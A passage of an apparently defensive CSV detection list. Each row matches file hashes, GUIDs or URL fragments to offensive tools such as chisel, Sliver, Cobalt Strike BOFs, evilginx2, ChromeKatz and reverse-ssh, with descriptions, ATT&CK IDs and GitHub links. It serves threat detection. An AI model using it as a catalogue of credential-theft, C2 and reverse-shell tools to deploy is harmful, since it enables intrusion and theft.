- T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*7116f92ef4bdbb61fe15e5158197c984bd61ea944d95a854f30e58b19db43dc1*",".{0,1000}7116f92ef4bdbb61fe15e5158197c984bd61ea944d95a854f30e58b19db43dc1.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*713724C3-2367-49FA-B03F-AB4B336FB405*",".{0,1000}713724C3\-2367\-49FA\-B03F\-AB4B336FB405.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object File (BOF) Conversion of the Mockingjay Process Injection Technique","T1055.012 - T1059.001 - T1027.002","TA0002 - TA0005","N/A","N/A","C2","https://github.com/ewby/Mockingjay_BOF","1","0","N/A","9","10","143","16","2023-11-07T19:04:03Z","2023-08-27T06:01:28Z" "*7148724805f706f8da206b24e03f2f6381bb9bc6959bbf51b6414ea8903caddd*",".{0,1000}7148724805f706f8da206b24e03f2f6381bb9bc6959bbf51b6414ea8903caddd.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*716066f05bcc12159c8f0d16846f924b928c75cbae2eb36f9b96b2d8f770cb54*",".{0,1000}716066f05bcc12159c8f0d16846f924b928c75cbae2eb36f9b96b2d8f770cb54.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*7187c30cc73eeed90f61f91911272ae2868636667dfb30862b54aafb4164794a*",".{0,1000}7187c30cc73eeed90f61f91911272ae2868636667dfb30862b54aafb4164794a.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*71f693cce010e95145ada158a6ec7e7b1b9902f222dc53d9d54bee4d75031951*",".{0,1000}71f693cce010e95145ada158a6ec7e7b1b9902f222dc53d9d54bee4d75031951.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*72324d0492f79682a741e82343a6535c07a0b2f95fcbf592fc80b242b41abfbb*",".{0,1000}72324d0492f79682a741e82343a6535c07a0b2f95fcbf592fc80b242b41abfbb.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*723c4fa580d252cfdafda962e5abb6b45eec8c9aae56497d98983ce6dcf9a1ac*",".{0,1000}723c4fa580d252cfdafda962e5abb6b45eec8c9aae56497d98983ce6dcf9a1ac.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","N/A","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","file_hash","8","10","7984","1339","2024-04-19T07:11:03Z","2020-11-13T16:35:20Z" "*724f896a9176d6559e7ee09e6c2722665beee437b19869e316988a758b735809*",".{0,1000}724f896a9176d6559e7ee09e6c2722665beee437b19869e316988a758b735809.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*7267a9321dd7ab890af5892975e257f89b2e53c70216c3708be9b0418e6b470e*",".{0,1000}7267a9321dd7ab890af5892975e257f89b2e53c70216c3708be9b0418e6b470e.{0,1000}","offensive_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059 - T1204 - T1547","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/optiv/Ivy","1","0","N/A","10","8","729","127","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z" "*726888af98eaa956dd40e486f4fcb93d7e12880f9540d9f28aabda8f90035c1a*",".{0,1000}726888af98eaa956dd40e486f4fcb93d7e12880f9540d9f28aabda8f90035c1a.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Meckazin/ChromeKatz","1","0","N/A","10","4","318","28","2024-04-23T18:29:17Z","2023-12-07T22:27:06Z" "*72943e841e721066a5db4d3c3c3e03bfcf3cc275802893e1bd678723e7c82ede*",".{0,1000}72943e841e721066a5db4d3c3c3e03bfcf3cc275802893e1bd678723e7c82ede.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*729ed6976b1710e57fb5e486e1a017b39a437895ae86056c2aa3d45763a6f330*",".{0,1000}729ed6976b1710e57fb5e486e1a017b39a437895ae86056c2aa3d45763a6f330.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","N/A","9","4","N/A","N/A","N/A","N/A" "*72af248c9e2b92add20bde3532f73569fe2c3e941fd12c72f13696f6ccd60813*",".{0,1000}72af248c9e2b92add20bde3532f73569fe2c3e941fd12c72f13696f6ccd60813.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*72b2d05cbbdea293859fc1a06651a3932c4b72675a0e014ad91a3b413cbd15c4*",".{0,1000}72b2d05cbbdea293859fc1a06651a3932c4b72675a0e014ad91a3b413cbd15c4.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*72b675d40bc3c796892caef0581456f9a489e7195527f67ea5b819dac372e89a*",".{0,1000}72b675d40bc3c796892caef0581456f9a489e7195527f67ea5b819dac372e89a.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*72ca2211283a4596dbd2881e3cbd8fb8f07420e0b7404bb298eab30873f487ed*",".{0,1000}72ca2211283a4596dbd2881e3cbd8fb8f07420e0b7404bb298eab30873f487ed.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","N/A","10","10","875","126","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z" "*72dcd04c582db154eee02cde9a14312542b86615a88bf47d6529b26f8c87914c*",".{0,1000}72dcd04c582db154eee02cde9a14312542b86615a88bf47d6529b26f8c87914c.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*7315b2a962905112c0a7172a5efbd5392d27b059a7c4a035eb38e39bcf2e19d1*",".{0,1000}7315b2a962905112c0a7172a5efbd5392d27b059a7c4a035eb38e39bcf2e19d1.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*732211ae-4891-40d3-b2b6-85ebd6f5ffff*",".{0,1000}732211ae\-4891\-40d3\-b2b6\-85ebd6f5ffff.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","0","N/A","10","10","321","32","2023-11-20T17:30:34Z","2023-11-20T10:01:36Z" "*73226E13-1701-424E-A4F2-3E4D575A1DD0*",".{0,1000}73226E13\-1701\-424E\-A4F2\-3E4D575A1DD0.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*733366cd878504e71534180b9d93fa01139ff82e4cd2f61b15f1de71bd292fa7*",".{0,1000}733366cd878504e71534180b9d93fa01139ff82e4cd2f61b15f1de71bd292fa7.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*733fe0591092a284f149d186d66f2435a6196769cd34f65909a23bdf1e907d84*",".{0,1000}733fe0591092a284f149d186d66f2435a6196769cd34f65909a23bdf1e907d84.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*73415a38d4b76dd2215d9fd81015b36a025018552f7847494f908f50c62fc8d2*",".{0,1000}73415a38d4b76dd2215d9fd81015b36a025018552f7847494f908f50c62fc8d2.{0,1000}","offensive_tool_keyword","Elevator","UAC bypass by abusing RPC and debug objects.","T1548.002","TA0004","N/A","N/A","Privilege Escalation","https://github.com/Kudaes/Elevator","1","0","N/A","10","6","589","68","2023-10-19T08:51:09Z","2022-08-25T21:39:28Z" "*73510d6bd5ae0d698d510c6ed240d7e5cefd0a2111a3123ff68ef63329bafece*",".{0,1000}73510d6bd5ae0d698d510c6ed240d7e5cefd0a2111a3123ff68ef63329bafece.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*73694f7f3a47359e3135c4da6e4eaab957047d9fc08ee8f0367d2beb5df4ca2f*",".{0,1000}73694f7f3a47359e3135c4da6e4eaab957047d9fc08ee8f0367d2beb5df4ca2f.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*736b362973af7010de9bf1cea58547a17a236e81a2084c344cf06a1b184698bb*",".{0,1000}736b362973af7010de9bf1cea58547a17a236e81a2084c344cf06a1b184698bb.{0,1000}","offensive_tool_keyword","LetMeowIn","A sophisticated covert Windows-based credential dumper using C++ and MASM x64.","T1003 - T1055.011 - T1148","TA0006","N/A","N/A","Credential Access","https://github.com/Meowmycks/LetMeowIn","1","0","N/A","10","3","263","44","2024-04-20T03:59:46Z","2024-04-09T16:33:27Z" "*7372d0b75d0e1e78951d47c88fdba0bf2f04eedf7b12dde37afb87d2622b6426*",".{0,1000}7372d0b75d0e1e78951d47c88fdba0bf2f04eedf7b12dde37afb87d2622b6426.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*73746146beb936f2c5fc328293b12683e1e893ba74f7c9f931a0e9fe1ab2d254*",".{0,1000}73746146beb936f2c5fc328293b12683e1e893ba74f7c9f931a0e9fe1ab2d254.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*73948912-CEBD-48ED-85E2-85FCD1D4F560*",".{0,1000}73948912\-CEBD\-48ED\-85E2\-85FCD1D4F560.{0,1000}","offensive_tool_keyword","DueDLLigence","Shellcode runner framework for application whitelisting bypasses and DLL side-loading","T1055.012 - T1218.011","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/mandiant/DueDLLigence","1","0","N/A","10","5","462","88","2023-06-02T14:24:43Z","2019-10-04T18:34:27Z" "*73B2C22B-C020-45B7-BF61-B48F49A2693F*",".{0,1000}73B2C22B\-C020\-45B7\-BF61\-B48F49A2693F.{0,1000}","offensive_tool_keyword","SharpRDPThief","A C# implementation of RDPThief to steal credentials from RDP","T1056.004 - T1110 - T1563.002","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/passthehashbrowns/SharpRDPThief","1","0","N/A","10","2","154","28","2020-08-28T03:48:51Z","2020-08-26T22:27:36Z" "*73F11EE8-F565-479E-8366-BD74EE467CE8*",".{0,1000}73F11EE8\-F565\-479E\-8366\-BD74EE467CE8.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*7418d1e6a74aea632ed7f6d7310130cea80b8f6e2df0592fa344bae7987d17c9*",".{0,1000}7418d1e6a74aea632ed7f6d7310130cea80b8f6e2df0592fa344bae7987d17c9.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*7423162b1a3b77b3cb5f76173204dd5983b683ae*",".{0,1000}7423162b1a3b77b3cb5f76173204dd5983b683ae.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","10","10","735","120","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z" "*743311db70cca9995302b8033669c33560debfe7f1ba581a92d3aa02c27856fe*",".{0,1000}743311db70cca9995302b8033669c33560debfe7f1ba581a92d3aa02c27856fe.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*7443/new/payloads*",".{0,1000}7443\/new\/payloads.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","166","35","2024-04-25T14:30:04Z","2022-01-24T20:44:38Z" "*745d105a0ce33f13d32c65e383e0c8a3e2446b5d279008fe1665737bbc8a6b18*",".{0,1000}745d105a0ce33f13d32c65e383e0c8a3e2446b5d279008fe1665737bbc8a6b18.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*74ae919aa5d393c04fd5b2a8048b8df764e871f1e652099d50c5ea63fb06a2e1*",".{0,1000}74ae919aa5d393c04fd5b2a8048b8df764e871f1e652099d50c5ea63fb06a2e1.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*74c46a8cf10e17f507701a84dc429eb7a7a276f0d8e15b4026a3242a1bc0a625*",".{0,1000}74c46a8cf10e17f507701a84dc429eb7a7a276f0d8e15b4026a3242a1bc0a625.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*75007cb1974bca92234e5e178b17a429922c54676bc446d032464e358d26510a*",".{0,1000}75007cb1974bca92234e5e178b17a429922c54676bc446d032464e358d26510a.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","N/A","10","10","1922","376","2024-04-30T13:32:24Z","2017-04-05T17:05:10Z" "*7504dee72e18b91d0f759f04385a968879699c228dae9c9a2c338dc7b76f3178*",".{0,1000}7504dee72e18b91d0f759f04385a968879699c228dae9c9a2c338dc7b76f3178.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*7531c23a8951439bfea1349ac6ad30a9bc5c1269718aaa7e320986a32cd05d30*",".{0,1000}7531c23a8951439bfea1349ac6ad30a9bc5c1269718aaa7e320986a32cd05d30.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*75374c3f9c0ddde44a47e4a780f2ee779e2a1350d8cbea052708b20cdd289599*",".{0,1000}75374c3f9c0ddde44a47e4a780f2ee779e2a1350d8cbea052708b20cdd289599.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*75852d74cacf2d568b1729555ce3cf8814006764fe4580c6aa51c51427558534*",".{0,1000}75852d74cacf2d568b1729555ce3cf8814006764fe4580c6aa51c51427558534.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*7599c19b85ae59e83faafccf122bef1d93a0642018c4052b09a56dae06272311*",".{0,1000}7599c19b85ae59e83faafccf122bef1d93a0642018c4052b09a56dae06272311.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" 